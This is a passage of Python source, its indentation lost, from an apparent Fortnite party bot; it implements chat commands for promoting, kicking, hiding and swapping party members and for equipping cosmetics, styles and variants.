if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_promote_user')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['kick']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['kick']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_kick_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['hide']:
try:
if rawcontent == '':
await client.hide()
await reply(message, client, l('hide_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_hide_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['show']:
try:
if rawcontent == '':
await client.show()
await reply(message, client, l('show_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_show_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['ready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.READY)
await reply(message, client, l('set_to', l('readystate'), l('ready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.NOT_READY)
await reply(message, client, l('set_to', l('readystate'), l('unready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sitout']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.SITTING_OUT)
await reply(message, client, l('set_to', l('readystate'), l('sitout')))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['match']:
try:
await client.party.me.set_in_match(players_left=int(args[1]) if args[1:2] else 100)
await reply(message, client, l('set_to', l('matchstate'), l('remaining', args[1] if args[1:2] else "100")))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('remaining_must_be_between_0_and_255'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unmatch']:
try:
await client.party.me.clear_in_match()
await reply(message, client, l('set_to', l('matchstate'), l('off')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['swap']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['swap']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
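# Keep a copy of the real squad assignments; the visual layout is
# patched in after the swap, then the real layout is restored.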
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
await asyncio.sleep(2)
client.party.meta.set_squad_assignments(real_members)
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
await asyncio.sleep(2)
client.party.meta.set_squad_assignments(real_members)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_swap_user')}"
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['stop']:
try:
client.stopcheck = True
if await client.change_asset(message.author.id, "Emote", ""):
await reply(message, client, l('stopped'))
else:
await reply(message, client, l('locked'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setenlightenment']:
try:
if await client.change_asset(message.author.id, "Outfit", client.party.me.outfit, client.party.me.outfit_variants,(args[1],args[2])) is True:
await reply(message, client, l('set_to', 'enlightenment', f'{args[1]}, {args[2]}'))
else:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setenlightenment']}] [{l('number')}] [{l('number')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addeditems']:
try:
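# Fetch the newest cosmetics from the BenBot API and equip each one in
# turn, skipping ignored types; the stop command aborts the loop.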
async with aiohttp.ClientSession() as session:
res = await session.get("https://benbotfn.tk/api/v1/newCosmetics")
res = await res.json()
flag = False
items = res["items"]
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('addeditem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['shopitems']:
try:
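# Flatten the current item shop (featured, daily and both special
# sections) into id/type entries, then equip each one in turn.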
store = await client.fetch_item_shop()
items = []
for item in (store.featured_items
+ store.daily_items
+ store.special_featured_items
+ store.special_daily_items):
for grant in item.grants:
if convert_backend_type(grant["type"]) in ignoretype:
continue
item = {
"id": grant["asset"],
"type": convert_to_asset(convert_to_old_type(convert_backend_type(grant["type"]))),
"backendType": grant["type"]
}
items.append(item)
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
i = await loop.run_in_executor(None,search_item,data["search-lang"],"id",item["id"],convert_backend_type(item["backendType"]))
if i:
i = i[0]
if data['loglevel'] == 'normal':
await reply(message, client, f"{i['shortDescription']}: {i['name']}")
else:
await reply(message, client, f"{i['shortDescription']}: {i['name']} | {i['id']}")
else:
await reply(message, client, item["id"])
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('shopitem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("alloutfit", "allbackpack", "allpet", "allpickaxe", "allemote", "allemoji", "alltoy")]:
type_ = convert_to_type(args[0])
try:
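# Cycle through every item of this type from the bundled
# items/<type>_<lang>.json list, two seconds apart; stop aborts the loop.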
if getattr(client,f"{convert_to_old_type(type_)}lock") and client.lock_check(message.author.id):
await reply(message, client, l('locked'))
return
with open(f'items/{type_}_{data["search-lang"]}.json', 'r', encoding='utf-8') as f:
allitem = json.load(f)
for item in allitem:
if client.stopcheck:
client.stopcheck = False
break
await client.change_asset(message.author.id, type_, item["id"])
await asyncio.sleep(2)
else:
await reply(message, client, l('all_end', l(convert_to_old_type(type_))))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")]:
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")]:
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['set']:
if rawcontent == '':
await reply(message, client, f"[{commands['set']}] [{l('setname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "set", rawcontent)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "set", rawcontent)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['set']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}({result[0]['set']})")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {result[0]['set']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}({result[0]['set']})"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['set']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}({item['set']})")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item}
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setstyle']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")]:
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addstyle']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")]:
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
variants_ = eval(f"client.party.me.{type_}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants_} + {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setvariant']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")]:
await reply(message, client, f"[{commands['setvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
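# Variants are given as '<channel> <value>' pairs starting at args[2].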
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter',**variantdict)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addvariant']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")]:
await reply(message, client, f"[{commands['addvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
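# Same '<channel> <value>' pairing as setvariant, but merged with the
# variants already applied to the current item.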
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter',**variantdict)
variants += eval(f"client.party.me.{convert_to_asset(args[1])}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0].lower().startswith(id_) for id_ in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_")]:
try:
type_ = convert_to_type(args[0])
if not await client.change_asset(message.author.id, type_, args[0]):
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0].lower().startswith('playlist_'):
try:
await client.party.set_playlist(args[0])
await reply(message, client, l('set_playlist', args[0]))
data['fortnite']['playlist']=args[0]
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
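# Mimic commands: 'true'/'false' switch mimicking on or off; anything
# else is treated as a user search and sets that user as the mimic target.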
keys = {
"outfitmimic": ["outfitmimic", l('mimic', l("outfit"))],
"backpackmimic": ["backpackmimic", l('mimic', l("backpack"))],
"pickaxemimic": ["pickaxemimic", l('mimic', l("pickaxe"))],
"emotemimic": ["emotemimic", l('mimic', l("emote"))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
